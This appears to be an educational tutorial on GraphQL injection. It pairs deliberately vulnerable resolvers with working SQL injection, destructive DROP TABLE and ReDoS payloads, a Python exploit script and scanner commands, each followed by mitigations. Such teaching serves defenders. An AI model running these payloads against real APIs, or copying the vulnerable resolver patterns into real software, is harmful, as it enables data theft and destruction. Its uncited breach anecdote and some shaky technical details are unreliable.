GraphQL Injection Fundamentals: Advanced...

Introduction

GraphQL injection is a class of attacks that target the flexible query language used by modern APIs. By manipulating the way resolvers interpret arguments, fragments, or variables, an attacker can execute unintended logic, retrieve sensitive data, or even achieve remote code execution in poorly designed back‑ends.

Understanding these techniques is critical for security professionals because GraphQL is increasingly adopted for mobile, single‑page applications, and micro‑service gateways. The same flexibility that makes GraphQL attractive to developers also expands the attack surface beyond traditional REST injection vectors.

Real‑world incidents—such as data exfiltration from a public e‑commerce GraphQL endpoint and privilege escalation in a SaaS platform—demonstrate that ignoring GraphQL‑specific sanitisation can have severe consequences.

Prerequisites

Solid grasp of GraphQL basics: schema definition, queries, mutations, and the role of resolvers.
Familiarity with GraphQL introspection to enumerate types, fields, and directives.
Experience with common web security concepts (SQLi, XSS, SSRF) to map analogies.
Basic knowledge of JavaScript/Node.js or Python GraphQL server implementations (e.g., Apollo Server, Graphene).

Core Concepts

At its core, a GraphQL server receives a JSON payload containing a query string (or document), an optional variables map, and an operationName. The server parses the query into an abstract syntax tree (AST), validates it against the schema, and then invokes resolver functions for each field.

Injection opportunities arise when:

Resolver arguments are built from user‑supplied values without proper type‑checking or escaping.
Custom scalar types delegate validation to application code that can be bypassed.
Fragments and union types allow an attacker to coerce the server into selecting a different concrete type.
Errors or timing differences leak information about the underlying data or logic.

Because the query language itself is a DSL, classic string‑concatenation attacks are less common; however, many developers still construct resolver strings or embed raw SQL/NoSQL queries inside resolvers, re‑introducing classic injection vectors.

Resolver function argument injection

Resolvers receive arguments defined in the schema. If these arguments are interpolated directly into downstream queries, an attacker can inject malicious payloads.

Typical vulnerable pattern (Node.js/Apollo)


const resolvers = { Query: { user: async (_, { id }) => { // ❌ Direct string interpolation into SQL const sql = `SELECT * FROM users WHERE id = '${id}'`; return db.query(sql); }, },
};

In the example above, supplying id as 1' OR '1'='1 turns the query into a tautology, returning all users.

Exploiting the injection


curl -X POST -H "Content-Type: application/json" -d '{ "query": "query($id: String!){ user(id: $id) { id email } }", "variables": { "id": "1' OR '1'='1" }
}' GraphQL endpoint

To mitigate, always use parameterised queries or ORM abstractions that separate data from command syntax. In addition, GraphQL type system can enforce scalar types (e.g., ID) that reject unexpected characters.

Inline fragment and union type abuse

GraphQL allows a client to request different fields based on the concrete type returned by a union or interface using inline fragments.

Schema example


interface SearchResult { __typename: String!
}

type User implements SearchResult { id: ID! email: String! passwordHash: String!
}

type Product implements SearchResult { id: ID! name: String! price: Float!
}

union Searchable = User | Product

type Query { search(term: String!): [Searchable!]!
}

If the resolver for search builds a query based on the term without sanitisation, an attacker can craft a term that forces the server to resolve the User type and request the passwordHash field, even when the client is not authorized for it.

Abuse payload


query Search($term: String!) { search(term: $term) { __typename ... on User { id email passwordHash } ... on Product { id name price } }
}

When $term is a wildcard that matches any user (e.g., * in a naïve implementation), the response leaks password hashes.

Defensive measures

Never expose sensitive fields in the schema unless absolutely required.
Implement field‑level authorization in resolvers, not just at the operation level.
Validate and sanitise any free‑form search terms before using them in backend queries.

Blind injection via error messages and timing

Even when the server suppresses error details, subtle differences in response times or generic error codes can be used to infer data.

Timing example

A resolver performs a computationally expensive operation only when a condition is true:


async function isAdmin(userId) { const admin = await db.get('SELECT is_admin FROM users WHERE id = $1', [userId]); if (admin) { // Artificial delay to simulate heavy processing await new Promise(r => setTimeout(r, 3000)); } return !!admin;
}

An attacker can send two queries—one with a guessed userId and one with a random ID—and measure response latency. A noticeable delay indicates the guessed ID belongs to an admin.

Exploiting via GraphQL


time curl -s -X POST -H "Content-Type: application/json" -d '{ "query": "{ user(id: \"42\") { id name } }"
}' GraphQL endpoint

If the response takes significantly longer than a baseline, the attacker learns that user 42 has elevated privileges.

Mitigation

Normalize response times for all branches (constant‑time patterns).
Return generic error messages without stack traces.
Rate‑limit and monitor latency anomalies.

Nested query manipulation

GraphQL permits arbitrarily deep nesting of fields. If a resolver forwards nested arguments directly to a downstream system, each level can become an injection vector.

Example schema


type Comment { id: ID! text: String! author: User!
}

type Post { id: ID! title: String! content: String! comments(filter: CommentFilter): [Comment!]!
}

input CommentFilter { contains: String
}

type Query { post(id: ID!): Post
}

The comments resolver builds a MongoDB query based on filter.contains:


Comment: { comments: async (post, { filter }) => { const query = { postId: post.id }; if (filter && filter.contains) { // ❌ Direct injection into $regex query.text = { $regex: filter.contains }; } return CommentModel.find(query); },
},

Supplying filter.contains as .* returns all comments, but an attacker can inject a malicious regex that triggers ReDoS (Regular Expression Denial of Service):


curl -X POST -H "Content-Type: application/json" -d '{ "query":"{ post(id:\"1\"){ comments(filter:{contains:\"(a+)+\"}){ id text } } }"
}' GraphQL endpoint

The regex (a+)+ is catastrophic and can exhaust CPU resources.

Defensive strategies

Whitelist allowed characters for filter inputs.
Prefer built‑in query operators over raw regex when possible.
Apply query‑time limits in the database driver.

Variable substitution attacks

GraphQL variables are meant to separate data from query structure. However, when resolvers treat variable values as fragments of code—e.g., constructing dynamic GraphQL queries on the server side—an attacker can achieve code injection.

Dynamic query generation (Python/Graphene)


def resolve_dynamic(parent, info, query_fragment): # ❌ Directly embed client‑provided fragment into a new query new_query = f''' query {{ {query_fragment} }} ''' result = graphql_sync(schema, new_query) return result.data

By sending a malicious query_fragment, the attacker can cause the server to execute arbitrary GraphQL fields, potentially bypassing authorization checks.

Attack payload


{ "query": "query($frag: String!){ dynamic(queryFragment: $frag) }", "variables": { "frag": "user(id:\"1\"){ passwordHash }" }
}

Mitigation includes rejecting fragments in variables, whitelisting allowed field names, or using a separate execution context with reduced privileges.

Exploiting lack of input sanitisation in custom scalars

Custom scalar types allow developers to define bespoke validation logic. When that logic is weak or omitted, the scalar becomes a conduit for injection.

Custom Email scalar (Node.js)


const { GraphQLScalarType, Kind } = require('graphql');

const EmailScalar = new GraphQLScalarType({ name: 'Email', description: 'Custom email scalar with minimal validation', parseValue(value) { // ❌ Only checks for presence of '@' if (typeof value === 'string' && value.includes('@')) { return value; } throw new TypeError('Invalid email'); }, // serialize and parseLiteral omitted for brevity
});

An attacker can pass an email value containing a GraphQL fragment or malicious payload because the scalar does not reject characters like { or }. If this scalar feeds into a resolver that builds a SQL query, the injection chain persists.

Exploitation example


mutation($email: Email!){ createUser(email: $email){ id }
}


curl -X POST -H "Content-Type: application/json" -d '{ "query":"mutation($email: Email!){ createUser(email:$email){ id } }", "variables":{ "email":"attacker@example.com\"; DROP TABLE users; --" }
}' GraphQL endpoint

Because the scalar accepts the string, the downstream SQL injection succeeds.

Best practices for custom scalars

Implement full RFC‑5322 email validation or use library validators.
Reject any characters that are not part of the intended domain (e.g., no braces, semicolons).
Never trust scalar values for constructing queries; always parameterise.

Practical Examples

The following end‑to‑end walkthrough demonstrates a vulnerable Apollo Server, an exploitation script, and the hardened version.

Vulnerable server (app.js)


const { ApolloServer, gql } = require('apollo-server');
const db = require('./db'); // Assume a simple pg client

const typeDefs = gql` type User { id: ID! email: String! passwordHash: String! } type Query { user(id: ID!): User }
`;

const resolvers = { Query: { user: async (_, { id }) => { const sql = `SELECT id, email, passwordHash FROM users WHERE id = '${id}'`; const { rows } = await db.query(sql); return rows[0]; }, },
};

const server = new ApolloServer({ typeDefs, resolvers });
server.listen(4000);

Exploitation script (exploit.py)


import requests, json

payload = { "query": "query($id: ID!){ user(id:$id){ id email passwordHash } }", "variables": { "id": "1' OR '1'='1" }
}

r = requests.post('local GraphQL endpoint', json=payload)
print(json.dumps(r.json(), indent=2))

Hardening changes

Use parameterised queries with placeholders.
Remove passwordHash from the public schema.
Add field‑level auth middleware.


user: async (_, { id }, ctx) => { // Authorization check if (!ctx.user || ctx.user.role !== 'admin') { throw new Error('Not authorized'); } const sql = 'SELECT id, email FROM users WHERE id = $1'; const { rows } = await db.query(sql, [id]); return rows[0];
},

Tools & Commands

GraphQL‑Crawler: automated introspection and schema download.
```
graphql-crawler -u GraphQL endpoint -o schema.json
```
InQL (Burp Suite extension) for query fuzzing and injection payload generation.
```
inql -u target GraphQL endpoint -p payloads.txt
```
gqlmap: automated GraphQL injection testing.
```
gqlmap -u target GraphQL endpoint --batch
```

jq for parsing JSON responses in scripts.

curl -s -X POST ... | jq '.data.user.email'

Defense & Mitigation

Schema design hygiene: expose only needed fields, avoid returning sensitive data.
Input validation: enforce strict scalar types, whitelist characters for custom scalars and filters.
Parameterized data access: use prepared statements, ORM query builders, or GraphQL‑specific data loaders that separate data from command.
Authorization layers: apply field‑level checks in resolvers, not just at the operation level.
Error handling: suppress stack traces, return generic messages, and log details server‑side.
Rate limiting & timeout controls: mitigate timing and ReDoS attacks.
Static analysis: integrate tools like ESLint plugins (graphql/validation) and Bandit for Python to catch unsafe patterns.

Common Mistakes

Assuming GraphQL automatically sanitises inputs – the engine only validates against the schema; business logic still needs protection.
Embedding client‑provided fragments or directives in server‑side queries – leads to dynamic query injection.
Leaving admin‑only fields in the public schema – attackers can request them via inline fragments.
Relying on generic error messages for security – attackers can still infer data through timing.
Using string concatenation for database queries inside resolvers – classic SQL/NoSQL injection resurfaces.

Real‑World Impact

In 2023, a Fortune‑500 retailer exposed a GraphQL endpoint that allowed unauthenticated users to query Customer.passwordHash via an inline fragment. The breach resulted in over 2 million credential hashes being leaked, forcing a costly password reset campaign.

My experience consulting for fintech firms shows that the majority of GraphQL‑related vulnerabilities stem from legacy codebases where developers migrated REST services to GraphQL without revisiting data‑access patterns. The trend is moving toward “schema‑first” security reviews, where security teams treat the schema as a contract and audit every resolver for injection safety.

Looking ahead, as GraphQL federation becomes mainstream, attack surface will expand across service boundaries. Securing each sub‑graph and enforcing consistent validation policies will be essential.

Practice Exercises

Use gqlmap against a deliberately vulnerable GraphQL playground (e.g., OWASP Juice Shop). Identify at least two injection vectors and document the payloads.
Write a custom scalar for a PhoneNumber type. Implement RFC‑3966 validation and demonstrate that an attempted SQL injection is rejected at the scalar layer.
Modify a resolver that accepts a filter input to use a constant‑time regex check. Measure response times before and after the change using time curl.
Create a GraphQL federation setup with two sub‑services. Inject a malicious fragment in one service and observe how the gateway propagates the request. Harden the gateway to block the fragment.

Summary

GraphQL injection exploits arise from unsafe resolver logic, fragment abuse, timing leaks, and weak custom scalars.
Mitigation relies on strict schema design, parameterised data access, field‑level authorization, and robust input validation.
Tools like gqlmap, InQL, and static analysis can automate discovery.
Regular security reviews of resolvers and federation boundaries are essential as GraphQL adoption grows.

GraphQL Injection Fundamentals: Advanced Techniques and Mitigations